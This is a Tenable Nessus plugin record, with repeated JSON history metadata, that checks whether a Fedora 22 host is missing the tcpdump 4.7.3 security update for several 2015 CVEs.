ID FEDORA_2015-4804.NASL Type nessus Reporter Tenable Modified 2015-10-19T00:00:00
Description
Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261,
CVE-2015-2154, CVE-2015-2153, CVE-2015-2155.
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory 2015-4804.
#
include("compat.inc");
if (description)
{
script_id(82556);
script_version("$Revision: 1.3 $");
script_cvs_date("$Date: 2015/10/19 23:06:18 $");
script_cve_id("CVE-2015-0261", "CVE-2015-2153", "CVE-2015-2154");
script_bugtraq_id(73017, 73018, 73019);
script_xref(name:"FEDORA", value:"2015-4804");
script_name(english:"Fedora 22 : tcpdump-4.7.3-1.fc22 (2015-4804)");
script_summary(english:"Checks rpm output for the updated package.");
script_set_attribute(
attribute:"synopsis",
value:"The remote Fedora host is missing a security update."
);
script_set_attribute(
attribute:"description",
value:
"Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261,
CVE-2015-2154, CVE-2015-2153, CVE-2015-2155.
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.redhat.com/show_bug.cgi?id=1201792"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.redhat.com/show_bug.cgi?id=1201795"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.redhat.com/show_bug.cgi?id=1201797"
);
# https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153999.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?75b00466"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected tcpdump package."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:ND/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:tcpdump");
script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:22");
script_set_attribute(attribute:"patch_publication_date", value:"2015/03/28");
script_set_attribute(attribute:"plugin_publication_date", value:"2015/04/03");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2015 Tenable Network Security, Inc.");
script_family(english:"Fedora Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! ereg(pattern:"^22([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 22.x", "Fedora " + os_ver);
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);
flag = 0;
if (rpm_check(release:"FC22", reference:"tcpdump-4.7.3-1.fc22")) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
else security_hole(0);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "tcpdump");
}
{"id": "FEDORA_2015-4804.NASL", "bulletinFamily": "scanner", "title": "Fedora 22 : tcpdump-4.7.3-1.fc22 (2015-4804)", "description": "Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261,\nCVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2015-04-03T00:00:00", "modified": "2015-10-19T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=82556", "reporter": "Tenable", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1201795", "https://bugzilla.redhat.com/show_bug.cgi?id=1201792", "https://bugzilla.redhat.com/show_bug.cgi?id=1201797", "http://www.nessus.org/u?75b00466"], "cvelist": ["CVE-2015-0261", "CVE-2015-2154", "CVE-2015-2153"], "type": "nessus", "lastseen": "2019-01-16T20:21:13", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:fedoraproject:fedora:tcpdump", "cpe:/o:fedoraproject:fedora:22"], "cvelist": ["CVE-2015-0261", "CVE-2015-2154", "CVE-2015-2153"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261, CVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "267e94d0ac34750b2836a182af385ea226a98cbd627f208527463542a8bce573", "hashmap": [{"hash": "0cd6bae46b6c121e3245ba39dbe92ae7", "key": "cvelist"}, {"hash": "1717dc64ce58819ecb43043c920ac1e0", "key": "pluginID"}, {"hash": "3bf9f335cf7133ec3558c5981a7a5c4b", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "837fe056656f2dca971f36770f2f076e", "key": "description"}, {"hash": "da24fa604e71295d422585026996451c", "key": "title"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "4734fd35f6702a811bc9c2931dc22d6c", "key": "href"}, {"hash": "281278142c1d4f94e3e5900b417d6b70", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "c132aa5866a601b1193cd8b0c108aeb2", "key": "references"}, {"hash": "ebdf7e83bd7bce5ac84476b2fe2e176c", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=82556", "id": "FEDORA_2015-4804.NASL", "lastseen": "2017-10-29T13:37:03", "modified": "2015-10-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "82556", "published": "2015-04-03T00:00:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1201795", "https://bugzilla.redhat.com/show_bug.cgi?id=1201792", "https://bugzilla.redhat.com/show_bug.cgi?id=1201797", "http://www.nessus.org/u?75b00466"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4804.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82556);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:06:18 $\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\");\n script_bugtraq_id(73017, 73018, 73019);\n script_xref(name:\"FEDORA\", value:\"2015-4804\");\n\n script_name(english:\"Fedora 22 : tcpdump-4.7.3-1.fc22 (2015-4804)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261,\nCVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201792\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201795\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201797\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153999.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?75b00466\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"tcpdump-4.7.3-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump\");\n}\n", "title": "Fedora 22 : tcpdump-4.7.3-1.fc22 (2015-4804)", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2017-10-29T13:37:03"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:fedoraproject:fedora:tcpdump", "cpe:/o:fedoraproject:fedora:22"], "cvelist": ["CVE-2015-0261", "CVE-2015-2154", "CVE-2015-2153"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261, CVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "267e94d0ac34750b2836a182af385ea226a98cbd627f208527463542a8bce573", "hashmap": [{"hash": "0cd6bae46b6c121e3245ba39dbe92ae7", "key": "cvelist"}, {"hash": "1717dc64ce58819ecb43043c920ac1e0", "key": "pluginID"}, {"hash": "3bf9f335cf7133ec3558c5981a7a5c4b", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "837fe056656f2dca971f36770f2f076e", "key": "description"}, {"hash": "da24fa604e71295d422585026996451c", "key": "title"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "4734fd35f6702a811bc9c2931dc22d6c", "key": "href"}, {"hash": "281278142c1d4f94e3e5900b417d6b70", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "c132aa5866a601b1193cd8b0c108aeb2", "key": "references"}, {"hash": "ebdf7e83bd7bce5ac84476b2fe2e176c", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=82556", "id": "FEDORA_2015-4804.NASL", "lastseen": "2018-09-01T23:42:52", "modified": "2015-10-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "82556", "published": "2015-04-03T00:00:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1201795", "https://bugzilla.redhat.com/show_bug.cgi?id=1201792", "https://bugzilla.redhat.com/show_bug.cgi?id=1201797", "http://www.nessus.org/u?75b00466"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4804.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82556);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:06:18 $\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\");\n script_bugtraq_id(73017, 73018, 73019);\n script_xref(name:\"FEDORA\", value:\"2015-4804\");\n\n script_name(english:\"Fedora 22 : tcpdump-4.7.3-1.fc22 (2015-4804)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261,\nCVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201792\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201795\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201797\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153999.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?75b00466\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"tcpdump-4.7.3-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump\");\n}\n", "title": "Fedora 22 : tcpdump-4.7.3-1.fc22 (2015-4804)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 4, "lastseen": "2018-09-01T23:42:52"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:fedoraproject:fedora:tcpdump", "cpe:/o:fedoraproject:fedora:22"], "cvelist": ["CVE-2015-0261", "CVE-2015-2154", "CVE-2015-2153"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261, CVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 3, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "1f5c957094741b0aa4c09cf40f6b6ec97b8571f61056792d79c0863136060981", "hashmap": [{"hash": "0cd6bae46b6c121e3245ba39dbe92ae7", "key": "cvelist"}, {"hash": "1717dc64ce58819ecb43043c920ac1e0", "key": "pluginID"}, {"hash": "3bf9f335cf7133ec3558c5981a7a5c4b", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "837fe056656f2dca971f36770f2f076e", "key": "description"}, {"hash": "da24fa604e71295d422585026996451c", "key": "title"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "4734fd35f6702a811bc9c2931dc22d6c", "key": "href"}, {"hash": "281278142c1d4f94e3e5900b417d6b70", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "c132aa5866a601b1193cd8b0c108aeb2", "key": "references"}, {"hash": "ebdf7e83bd7bce5ac84476b2fe2e176c", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=82556", "id": "FEDORA_2015-4804.NASL", "lastseen": "2018-08-30T19:37:10", "modified": "2015-10-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "82556", "published": "2015-04-03T00:00:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1201795", "https://bugzilla.redhat.com/show_bug.cgi?id=1201792", "https://bugzilla.redhat.com/show_bug.cgi?id=1201797", "http://www.nessus.org/u?75b00466"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4804.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82556);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:06:18 $\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\");\n script_bugtraq_id(73017, 73018, 73019);\n script_xref(name:\"FEDORA\", value:\"2015-4804\");\n\n script_name(english:\"Fedora 22 : tcpdump-4.7.3-1.fc22 (2015-4804)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261,\nCVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201792\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201795\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201797\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153999.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?75b00466\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"tcpdump-4.7.3-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump\");\n}\n", "title": "Fedora 22 : tcpdump-4.7.3-1.fc22 (2015-4804)", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:37:10"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2015-0261", "CVE-2015-2154", "CVE-2015-2153"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261, CVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "enchantments": {}, "hash": "6861166277d65ce8563c272672d1fb6c25d7fa22306af333255a50d7059172ba", "hashmap": [{"hash": "0cd6bae46b6c121e3245ba39dbe92ae7", "key": "cvelist"}, {"hash": "1717dc64ce58819ecb43043c920ac1e0", "key": "pluginID"}, {"hash": "3bf9f335cf7133ec3558c5981a7a5c4b", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "837fe056656f2dca971f36770f2f076e", "key": "description"}, {"hash": "da24fa604e71295d422585026996451c", "key": "title"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "4734fd35f6702a811bc9c2931dc22d6c", "key": "href"}, {"hash": "281278142c1d4f94e3e5900b417d6b70", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "c132aa5866a601b1193cd8b0c108aeb2", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=82556", "id": "FEDORA_2015-4804.NASL", "lastseen": "2016-09-26T17:24:17", "modified": "2015-10-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.2", "pluginID": "82556", "published": "2015-04-03T00:00:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1201795", "https://bugzilla.redhat.com/show_bug.cgi?id=1201792", "https://bugzilla.redhat.com/show_bug.cgi?id=1201797", "http://www.nessus.org/u?75b00466"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4804.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82556);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:06:18 $\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\");\n script_bugtraq_id(73017, 73018, 73019);\n script_xref(name:\"FEDORA\", value:\"2015-4804\");\n\n script_name(english:\"Fedora 22 : tcpdump-4.7.3-1.fc22 (2015-4804)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Rebase to 